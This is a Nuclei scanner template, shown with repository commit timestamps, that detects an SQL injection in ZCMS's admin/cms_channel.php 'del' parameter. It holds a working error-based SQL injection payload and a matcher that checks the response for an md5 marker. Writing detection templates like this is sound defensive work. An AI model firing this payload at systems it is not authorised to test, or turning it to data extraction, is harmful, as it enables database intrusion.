nuclei-templates/vulnerabilities/other/zcms-v3-sqli.yaml

36 lines
1015 B
YAML
Raw Normal View History

2021-04-23 13:18:00 +00:00
id: zcms-v3-sqli
2021-04-23 13:18:00 +00:00
info:
name: ZCMS - SQL Injection
2021-04-23 13:18:00 +00:00
author: princechaddha
severity: critical
description: ZCMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.anquanke.com/post/id/183241
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
2021-04-23 13:18:00 +00:00
tags: zcms,sqli
2022-06-30 03:20:00 +00:00
variables:
num: "999999999"
2021-04-23 13:18:00 +00:00
requests:
- method: GET
path:
2022-06-30 03:20:00 +00:00
- "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
2021-04-23 13:18:00 +00:00
matchers-condition: and
matchers:
- type: word
words:
2022-06-30 03:20:00 +00:00
- '{{md5({{num}})}}'
2021-04-23 13:18:00 +00:00
part: body
2022-06-30 03:20:00 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/09/28